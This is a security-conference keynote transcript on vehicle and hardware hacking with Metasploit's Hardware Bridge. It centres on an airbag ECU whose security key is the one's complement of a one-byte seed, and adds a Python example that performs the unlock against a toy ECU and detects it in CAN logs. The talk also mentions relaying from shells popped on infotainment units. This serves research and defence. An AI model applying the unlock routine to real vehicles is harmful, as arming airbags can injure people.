
Morning Keynote

BSides KC · 2018 · 39:51 · 68 views · Published 2018-06 · Watch on YouTube ↗
Style: Keynote
About this talk
Craig is the Research Director of Transportation Security at Rapid7 as well as the Founder of Open Garages. Open Garages is a distributed collective of performance tuners, mechanics, security researchers and artists. He is also the author of the Car Hacker's Handbook and runs a security consulting firm that specializes in automotive reverse engineering. He has developed many open source utilities to teach CAN bus to students, as well as security penetration tools that can uncover vulnerabilities in vehicle and diagnostic systems. Craig is the core author of Metasploit's Hardware Bridge and has worked in the security field for over 20 years, with the last 5 years focused on automotive.
Transcript [en]

[Music]

Some of it is, for you guys who don't know, Craig is also what I would consider to be a red teamer, right? As the lingo goes, there's a lot of religious conflicts on the naming and the explanation. By trade I would put myself on the other side of it. Everybody has heard a little bit of this earlier, but basically the whole deal for you is that it's for you to really get together with people and do work and learn some things and try out stuff, make new friendships, and maybe hopefully take some things away from BSides that

inspires you or benefits the business that you work in. So all that said, we're here to learn and we're gonna do something. Thanks, guys. It's my first time at BSides KC; the facilities are fantastic, the amount of people... I think I heard briefly a couple of weeks ago that they had over 750 people signed up, phenomenal, absolutely very, very cool. So my name's Craig Smith, I am the research director of transportation security at Rapid7, so what that basically means is if it's a plane, train,

automobile, anything with a motor, really any kind of device that moves and has electronics, that's my wheelhouse. I do research or deal with policies and whatnot, the whole gamut. I also wrote the Car Hacker's Handbook, and much of my focus is on the tools we'll talk about today. And I'm with a company where we focus on network visibility, but a lot of that focus is on incident response and investigation and helping establish efforts to really do incident response, so I spend a lot of time doing a lot of response in a lot of places. Anyway, the folks there are all about

openness, or doing the right things when something bad happens to you. And so in this talk we're going to talk about where maybe hardware is part of it, but it's also more about this realm of attacking and defending. I see that we're very, very good as a security community at attacking things and protecting things that are on the internet; we know the protocols very well as long as it's on the internet. We have a lot of tools, frameworks and just years of experience now. However, we tend to fall short whenever it comes to things outside of the connected thing, so we've got our tools

that are just about... We need to bridge that gap between the digital internet world and the physical world when we're considering security. You have your access control, your cars, your phones, medical devices, your alarm system. So you know, all of these have security implications that definitely should be considered as affecting our corporate environment and safety, and we need to be able to include those in the same amount and the same quality of tests on those kinds of physical devices that we would on our website. Historically, most of these devices were

mechanical things, like discrete logic chips; you know, they basically actuated relays and things of that nature. As time progressed they got smaller and smaller and more flexible, but by doing that you basically have firmware, and firmware is basically software, and anything we have software in is also going to have bugs and vulnerabilities. Now, if those things are on the internet, that's simple: we see those in our scanners. If we're scanning and find one connected to our network we'll see it. But the only way to see a device that only talks over RF signals

is by nature different. We can find vulnerabilities that way, and oftentimes these are things like ICS equipment deployed on the network, or some startup that's creating some product and not thinking about security, or sometimes they're just trying to get something out there and get decent funding, so after their Kickstarter is done they get their product out and exit the company. And a lot of devices are usually... we desire to grab things, we put internet-enabled devices on IPv4, but a lot of them are not connected to the internet, right? So when you're doing those we still need a method to kind of look at

those and find vulnerabilities in them. Nobody can go back to simply replaying the key fob to open a car; that was a popular target. There are other ways to trigger this, and the other part we see a lot with vehicles is where they're using relay attacks to steal cars. This is the area right now where we're seeing cars actually attacked maliciously, with people stealing vehicles. It's still a little difficult for the attacker. From a red-teaming perspective we do have certain things that we usually stack up, these tools; not all of us have them: things like Proxmark, RF tools, or

similar hardware. And of course each one of these tools has its own framework, its own specific operating system, or its own way we use it. So while they're absolutely useful, it's not really part of our normal daily skills or technical abilities; it's not always the easiest thing to gather and use, and each product is different. So this is one of the reasons I built the Metasploit Hardware Bridge, and I chose Metasploit because it's mainly a platform that most people use or understand or are aware of its existence. It's a big attack framework, it is really internet-focused, and so some people will be scared

of hardware. So that will take us away from some of that. The Hardware Bridge has been in Metasploit since last year, and that's the part that allows you to bring in any language. The reason being is that one of the goals was to enable device vendors to write support in whatever language they want. If the vendor doesn't want to support you, that's also fine; you can actually write a wrapper around it and that works too. And we do this by talking on whatever the bus is: you talk to the hardware, whether it's a piece of hardware, a box, or a computer,

you talk to it the same way and it translates the data. So we have a relay; there's a lot of building blocks in the Metasploit space, so when you're in it you can easily just, you know, talk to the Hardware Bridge. This one is a Linux SocketCAN proof-of-concept server, a relay, and it uses can-utils. You can run the server and talk to it over CAN. If you go to the Metasploit repository there is a tools folder, and

there's another Ruby version; this one's called ELM327. The ELM327 dongles are like $10 to $20, relatively cheap. These are the devices you take with your cell phone and, you know, monitor your gas mileage with. With this relay you can use one of those, so you don't need a very expensive piece of kit.

[Music] In the same folder there's one in Python for KillerBee, and that uses the KillerBee framework, so if you're going to do ZigBee testing, all the hardware that KillerBee supports is now in Metasploit; I've only tested it with this one board. If you want to do RF signals, there's RfCat; for that one you just get the latest RfCat and it'll have a relay built in, so in the RfCat source there's a relay that works over RF signals. And then there's a new one I wrote two weeks ago, written in Rust, and I like it;

it has a lot more security around it, pretty cool framework. So this is my first major attempt at using Rust; feel free to flame me for it, it definitely could be broken down into crates and whatnot, but it's functional. This one also uses Linux SocketCAN; it's not the Python daemon, it just directly talks to CAN. This is mainly written because I needed a binary for the people over at Black Hat; there is a prototype coming out, so that's what that's for.

The benefit of having a binary version of the relay (this is not supported by Rapid7, this is something I wrote on my own) is that you could take this binary and, if you want to extend your kill chain, if you pop a shell on an appliance like an infotainment unit or you pop a shell on a Panasonic TV or something else, you can then push the binary to that device as a relay, and then basically relay and reach the hardware. So in the past the other ones required a full environment to do that. This isn't against the best practice of walking away, but if you are testing out a theory of, you know, did somebody do all

this kind of access. I do a demo all the time for new vehicle assessments; the demo is to demonstrate unlocking and starting a car from Arkansas. So that's out there; to get more analogous, we'll deploy airbags. So I'm going to do a demo in a second, but this is research done about a year ago, out of Germany, by two researchers who did some airbag research. We put together a Metasploit module for their research. What they were looking at is the standard, so people have the idea that if you get into a car, doesn't mean you can take it down;

you have to detonate the airbags first; most pyrotechnic devices do this. There's a tool for that, again for technical people, and there's a standard for how it works. So they were kind of looking through this, and we've got one of our airbag ECUs, and the way it works is it goes through and queries all the airbags: how many airbags are in your car. Then you say, I'm going to arm these devices, so it asks for security access. The way that works is the airbag module is going to send you a seed value, you run your secret sauce on it, and the response to that is what arms the devices.

So we start looking through this, and they ask for the seed value, and the seed is a one-byte number. Oh, that's a short key space; this isn't going to be too hard, we're going to get a research paper here. So they got that going, and then it started to be a little bit harder, and they realized that, oh, this is just a one's-complement algorithm. So if you take the seed as binary ones and zeros, you just invert the ones and zeros and that's your answer. So you can actually do this in your head, and that's actually where we're going, so

we're going to make the request, you get back a number, and a quick way is: what would you need to add to that number to get 255? Do this in your head. So we went over to the standard, and in the standard it says: okay, you're requesting a security access token, you know, run your seed through something, like for example this one's-complement equation. Oh, I see, they just kind of copied and pasted this. So they were very curious to see who else had done this, so they went and got some other vendors' airbag modules,

and yeah, they'd cut and pasted this one's-complement number. [Music] So there's a CVE for this. This is actually considered low-risk; the reason it's considered lower risk is because, per the standard, it's not supposed to be able to deploy while you're driving; it's supposed to check that the vehicle is not moving. But the thing is that the vehicle probably doesn't follow that standard. I was curious about it: if you authorize yourself, and then you send a bunch of spoofed packets saying, oh, I'm not driving right now, and then you say, well, you know that...

Nobody's answered that one yet; so anyone who wants a new research paper can take that one. So that's what comes with this thing right here: if you have the current version of Metasploit you have this module. It does not detonate the airbags; actually it was the university's decision to stop at that one; it's missing one line, and you'd have to reverse engineer that line. So I'm going through the demo in a simulated environment. I haven't actually done it in here because it might be dangerous, so I have a couple of things here: the simulation is currently running on

a simulator. It supports modules, and I had a couple of modules; the one that doesn't come standard is just one we use for testing at Metasploit, that's Rapid7's, to ensure that

that's right. All these tools are really available, you know, it's all in here. So all of these things as well I took and really, really safely...

[Music]

Right. You don't actually get the warning they're saying about the Metasploit actions on this hardware. So that's our warning for any attack where every function affects physical hardware. So you need to be set up there with the interpreter.

This is just like a 'which' command; it just means that I read and I run. After this, with the option that specifies, I ran right through modules, or under

there's not a lot of options to it; it's more information: where the research paper's at, all that good stuff, because as I said, I don't really see...

This is a pre-set attack. So if you run this, this is what comes out: when you query the airbag controller you get some information about it, and this is the pyrotechnic set. So here, to begin with, is the number of airbags in your vehicle, and then you pull out all of the different pyrotechnics; this one is a system with eleven, and you can usually pick which airbag you want to deploy, or you can deploy them all. Then it requests security access, and if it gets in, this actually leaves the vehicle in the

state of ready to deploy. If you really want to exit that state we suggest turning off the car. But yeah, this is a good way to just make sure that if your car has this vulnerability, you can verify it. And so with this we're going to use this as our example for some red team and blue team stuff.

It's pretty much that. Very simple and not a lot of packets; mostly it's the ones the university found. But if you were to take the standard sheet and look at it, it would follow exactly. Does anybody understand CAN bus now? Okay. So the reason why this is important is partly because the environment we live in today is, you know, sort of the AI type of world; they saw that episode where the AI took over everything. So forth, you know, we tend

to be twelve years away from being subservient to a greater intelligence than us. In the short term, you know, we have some liability and legal implications. That's an end game. I'm sorry I brought my children into this world. The way to think about this is what we're talking about here on the bus; it's not just on cars, and so as Craig talked about, in transportation there's an awful lot of places where these types of signals are going to be interesting, because it's physical information.

It's a safety thing: every device there has a sensor on it that provides some interface to, you know, some action, whether it be running the ship aground, or how much fuel is left for the guy that's driving my truck from his house in Kansas City to Seattle but not actually in the cab, and all of these things. So it's a very real situation. It's cool to do something interesting like, I'm gonna deploy some airbags in any car that I choose, but it's also really relevant. So, public service announcement here: I don't want to get into the red team or blue

team thing. I think the way that we think about it is, every time you do something from an attacker's perspective you should do it from a defender's perspective. It's the same thing: use the same technology, use the same tool set, practice that skill set, practice those other things that you've got. Oftentimes we'll find that it increases both sides. In reference to this, imagine that you're a guy that's working against somebody that wrote, you know, an exploit for something they spent three months on; you haven't seen it before, you don't know anything about that thing anyway, so what do you do? You're kind of in a tough situation. The key thing here

is you may see behaviors and execution that happen that you know are off the path. The way to think about all things: this particular type of threat is different than other types of things, but I'm going to approach it in the same way. The first thing is I'm going to spend the time to look through and understand the tools and technologies that happen and figure it out. So if you have somebody come in to do a compromise assessment and they've given you the 320-page report on it, you know, "I just popped everything here and on your domain controllers and I'm super awesome," then you also know that the

challenge is you didn't learn anything from that exercise, great. So, you know, one of the great examples is Craig's tools that allow you to execute those things. So when you finally get understanding... Let's take, for the sake of argument, that somebody's deployed airbags in a truck that I'm monitoring, and I have to understand what happened here and whether or not that was illicit or not, and then we get into a conversation about what we do about it. So, you know, let's think about this stuff, because I didn't write all the tools, I'm not a hacker, right? So for that moment I've

got to really start to understand what happened here. The first thing is, in this particular case as an example, I want to see the attack that Craig ran. So working in concert, we could pop some airbags, would be cool, what does that look like, what does that look like specifically? I think in that process I can determine what makes sense, like putting some detections or preventive controls around it, or even just understanding what happened. And so in doing that, one of the things that is great about standards is I need not understand

what this thing's like or what it is, but when I look to take some things off the virtual interface and take what we saw and then map it based on what the standard tells me, you can understand what it looks like, because that's what the standard says to do. And not everything follows what the standard dictates, right, most of the time. In this particular case you can pull something like, in a pile of traffic, what very clearly under the standard was happening in my, you know, snippet of time there. I could go into a little bit of detail here, but when you look at this

structure in each of these, because this is in a very small byte size, it isn't terribly difficult to reverse, and so even a guy like me can do that. So when we start to investigate, specifically look here and look at the map and some of the tools that Craig mentioned, I can tell you what is affected. This is the right one, yeah, and a zero-one here basically says this is the driver's side front airbag, and here, you know, what's illustrated is

so, you know, here is when I add this combination, every time I see something positive I get an addition of four hundred here for the second byte, and so I can see that in this case right here I have some actual correct behavior happening where I'm deploying airbags. Now I don't know whether or not that's legitimate, but again I'm just trying to decipher, you know, in the background what's happening here after somebody called me and said somebody destroyed that truck of mine, knowing that the airbags weren't supposed to go. So airbags were deployed, okay, I found where the airbags exist, and then here I

know exactly what was called here. So from a signal perspective I have the ability to basically put it back into a system and evaluate every single time I look at that network traffic, again successfully understanding when that's transpired. So I can also tell you that if it doesn't have the right sequence, in essence that's going to be something that I want to make sure I'm gonna do some diligence on right away. So here, tools of the trade: these are all tools that Craig used in conjunction, cangen, the can-utils tools, this is kind of industry standard I would say, and I think you can do anything that you want,

anything you do with Wireshark or, you know, tcpdump, or any other very commonplace tools, which interface with CAN. So you can also generate a large amount of traffic to validate a certain thing, can also craft packets, and we are doing that using these same tools so that I can sniff those and I can pass into the specific parts of the protocols below that. I can also utilize the same techniques, so if I want to get more than just sort of CAN header information, I'm going to look deeply into the underlying protocols, and I can do that. In my particular case, you know, think about this: the exercise here isn't just, it's cool, again, you know,

we pop some airbags. But you guys remember the Scantron test from high school and college? So you know how they graded those: they put a cover sheet on top of all of the answers and then they check all the ones that are correct; they don't check the incorrect ones next to it or things that are affected by it, right? And so when I take that off and look at it from a security perspective, all of my indicators are all the other answers other than the right one, right? And so what I want to understand is, are there any permutations of what Craig has demonstrated here that are potentially

effective? So again, in the case of an autonomous truck, I would like to know whether the automated systems are also subject to this type of behavior, as well as something else: is the driver's side airbag the most critical one there, or is it the passenger side airbag, and which one of those things has implications that are significantly more far-reaching than just, you know, gonna have a really bad problem with my neck for the next ten years? Maybe it does something on the safety side of things. So you take those things and you put them into the software development lifecycle, right? As a blue team guy, it's great for you to do triage, incident

response; however, if you're not feeding that back into the product itself or the vendor itself as a function of that, you're doing both yourself and the vendor a disservice. You should compare that real data. So I grabbed a particular set of packets here and I said, okay, well, this is interesting for me, I want to manifest on this sensor technology that I have here to make sure that that doesn't happen. And then as part of that is to make sure that I'm providing the coverage of that in my test procedure. Again, as a blue teamer, it's not just whether or not you're looking at and triaging traffic in the SIEM; that's the whole

lifecycle. So far so cool, but GPS is cool too. How many have phones? Okay. So, you know, this is also interesting, when they think about how do I understand what this looks like. The GPS environment was never designed for what it's being used for today, right? Military-grade GPS maybe, but we won't get into that here; but commercial GPS and things that people utilize here. This one has some relevance around a locomotive, but in other cases it's your phone that you're using to drive cars, it's the Waze app, it's whatever, and understanding what's happening is a function that is also super critical. So it's

probably appropriate to put in some things around that. And even though I was sort of educated a little bit on this last night, I think some other things around how HL7 operates... It would be cool if you looked at HL7 on the network; would you understand it? Okay, cool. So you would know how to prevent it anyway. Then that is these types of things: we get this level of visibility and the types of tools you can utilize to do that, where red team and blue team, you know, become pretty cool consumers. This is only relevant if it's exploitable, right, really, and so as a blue teamer I care about what's potentially going to

bring a system down, cause safety issues, you know, the risk to the business. And working with somebody like Craig on this piece has been really both enlightening about what the technology's capability is but also the tools to do it. So the last piece of this I want to leave you with is, you know, make sure consumers typically are aware as much as possible, right. So I'm going to triage incidents, I'm going to make sense of, whatever, you know, compliance requirements and these other things, but it's really important for them to do research as well, and research is adjusting the detections, research is all these other components, and it gives them both the lifeblood of making better security

decisions but also getting an opportunity to work in conjunction with industry-leading research that most manifests more support with the engineering. So something like BSides is an example of where these things come together as well. I think that's it. If you guys want to get a hold of either one of us, please feel free to drop an email; it's absolutely misspelled and there's no problem. So obviously, you know, hang out the rest of the day and get involved: get involved in the industry, get involved today, and if there's other things that you guys are interested in or research you want to hear about or whatever it is, grab

us to talk about

Oh hey, guys, about the safety of testing. The problem that I have: we've done this test, and the airbag fix is to put the state back to not being armed. Let's see, when you're doing this to your car or anything in general, you tend to get what's called a Christmas tree, in fact: the lights are blinking all over the place. It's relatively safe, it probably won't break your car doing this, but you will have heard on the back end they are pretty brutal.

that's the way enforcement

All right, so you're going to drive all the way here... people automatically have very great... to add authentication on them, and if somebody wants to talk to

it... You should definitely continue to check the number of devices interconnected. We're not going, by the way, into specifics, you know, where do I start, that's all.

yes [Music]

Yeah, yeah. The one that I work with was before the simulation of diagnostics, where we were before... that are responsible for that was actually attacked, but that's not a sign of... It would do things like blink the lights in the car and things of that nature. We might have one of those released with a little bit of time.

Anybody else have questions? Awesome. Before you guys check out, two important items: one, this room becomes, in a couple of minutes, almost immediately, three rooms, so I guess it's closing time.

[Applause]
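The talk's central technical point is the airbag module's SecurityAccess seed/key exchange, where the one-byte key is simply the one's complement of the seed (255 minus the seed), and the blue-team half is about recognizing that exchange in bus traffic. The following is an added example written for this page; it is not code from the talk, from the German researchers, or from Metasploit's Hardware Bridge. It models both sides against a toy ECU so it runs offline: the red-team side computes the key and drives the two-step exchange, and the blue-team side scans candump-style log lines for seed/key pairs that fit the one's-complement pattern. The UDS service and sub-function values (0x27, 0x01/0x02, 0x67, 0x7F and the negative response codes) are the ISO 14229 standard values; the diagnostic arbitration IDs 0x7E0/0x7E8, the `WeakEcu` class, the fixed seed, and the sample log lines are assumptions constructed for the example.

```python
"""Added example (not from the talk or Metasploit): a one's-complement UDS
SecurityAccess exchange against a toy ECU, plus a detector for it in candump logs."""
from typing import Dict, List, Optional, Tuple

# UDS (ISO 14229) SecurityAccess service and sub-functions: standard values.
SID_SECURITY_ACCESS = 0x27
POSITIVE_RESPONSE_OFFSET = 0x40     # positive response SID = request SID + 0x40
NEGATIVE_RESPONSE = 0x7F
SUB_REQUEST_SEED = 0x01
SUB_SEND_KEY = 0x02
NRC_SERVICE_NOT_SUPPORTED = 0x11
NRC_REQUEST_SEQUENCE_ERROR = 0x24
NRC_INVALID_KEY = 0x35

# Assumed diagnostic arbitration IDs (tester -> ECU, ECU -> tester) for this
# example; the talk does not say which IDs the module uses.
TESTER_ID = 0x7E0
ECU_ID = 0x7E8


def ones_complement_key(seed: int) -> int:
    """The 'secret sauce' from the talk: invert every bit of the one-byte seed.
    Identical to 255 - seed, which is why it can be done in your head."""
    if not 0 <= seed <= 0xFF:
        raise ValueError("seed must be a single byte")
    return (~seed) & 0xFF


def seed_request() -> bytes:
    # ISO-TP single frame: first byte is the payload length.
    return bytes([0x02, SID_SECURITY_ACCESS, SUB_REQUEST_SEED])


def key_frame(seed: int) -> bytes:
    return bytes([0x03, SID_SECURITY_ACCESS, SUB_SEND_KEY, ones_complement_key(seed)])


class WeakEcu:
    """Toy ECU (an assumption for this example) implementing the weak scheme.
    The seed is fixed so the run is reproducible; a real ECU would vary it."""

    def __init__(self, seed: int) -> None:
        self.seed = seed
        self.seed_issued = False
        self.unlocked = False

    def handle(self, frame: bytes) -> bytes:
        sid, sub = frame[1], frame[2]
        if sid != SID_SECURITY_ACCESS:
            return bytes([0x03, NEGATIVE_RESPONSE, sid, NRC_SERVICE_NOT_SUPPORTED])
        if sub == SUB_REQUEST_SEED:
            self.seed_issued = True
            return bytes([0x03, SID_SECURITY_ACCESS + POSITIVE_RESPONSE_OFFSET,
                          SUB_REQUEST_SEED, self.seed])
        if sub == SUB_SEND_KEY and self.seed_issued:
            self.seed_issued = False          # a key is only valid for one seed
            if frame[3] == ones_complement_key(self.seed):
                self.unlocked = True
                return bytes([0x02, SID_SECURITY_ACCESS + POSITIVE_RESPONSE_OFFSET, SUB_SEND_KEY])
            return bytes([0x03, NEGATIVE_RESPONSE, SID_SECURITY_ACCESS, NRC_INVALID_KEY])
        return bytes([0x03, NEGATIVE_RESPONSE, SID_SECURITY_ACCESS, NRC_REQUEST_SEQUENCE_ERROR])


def unlock(ecu: WeakEcu) -> List[Tuple[int, bytes]]:
    """Red-team side: run the two-step exchange and return the frames as
    (arbitration id, payload) in the order they would appear on the bus."""
    req = seed_request()
    seed_resp = ecu.handle(req)
    key = key_frame(seed_resp[3])            # seed is the byte after SID and sub-function
    key_resp = ecu.handle(key)
    return [(TESTER_ID, req), (ECU_ID, seed_resp), (TESTER_ID, key), (ECU_ID, key_resp)]


def parse_candump_line(line: str) -> Tuple[int, bytes]:
    # candump -L format: "(timestamp) iface ID#HEXDATA"
    _, _, frame = line.split()
    arb, data = frame.split("#")
    return int(arb, 16), bytes.fromhex(data)


def find_weak_unlocks(log_lines: List[str]) -> List[Dict[str, int]]:
    """Blue-team side: pair each issued seed with the key sent back and flag
    pairs where key == ~seed, i.e. the copy-pasted one's-complement scheme."""
    findings: List[Dict[str, int]] = []
    pending_seed: Optional[int] = None
    for line in log_lines:
        arb, data = parse_candump_line(line)
        if len(data) < 4:                     # seed and key frames carry 4 bytes
            continue
        sid, sub, value = data[1], data[2], data[3]
        if arb == ECU_ID and sid == SID_SECURITY_ACCESS + POSITIVE_RESPONSE_OFFSET and sub == SUB_REQUEST_SEED:
            pending_seed = value
        elif arb == TESTER_ID and sid == SID_SECURITY_ACCESS and sub == SUB_SEND_KEY and pending_seed is not None:
            if value == ones_complement_key(pending_seed):
                findings.append({"seed": pending_seed, "key": value})
            pending_seed = None
    return findings


# Constructed sample log (not a real capture): one weak unlock (0x1A -> 0xE5),
# then a seed/key pair that does not fit the one's-complement pattern.
SAMPLE_LOG = [
    "(1527880000.000001) vcan0 7E0#022701",
    "(1527880000.000002) vcan0 7E8#0367011A",
    "(1527880000.000003) vcan0 7E0#032702E5",
    "(1527880000.000004) vcan0 7E8#026702",
    "(1527880000.000005) vcan0 7E0#022701",
    "(1527880000.000006) vcan0 7E8#0367015C",
    "(1527880000.000007) vcan0 7E0#03270212",
]

if __name__ == "__main__":
    for arb, payload in unlock(WeakEcu(seed=0x1A)):
        print(f"{arb:03X}#{payload.hex().upper()}")
    print(find_weak_unlocks(SAMPLE_LOG))
```

The detector only pairs a key with the most recent seed and clears it afterwards, so a replayed key without a fresh seed is not counted; on a real vcan capture you would feed `candump -L vcan0` output into `find_weak_unlocks` line by line.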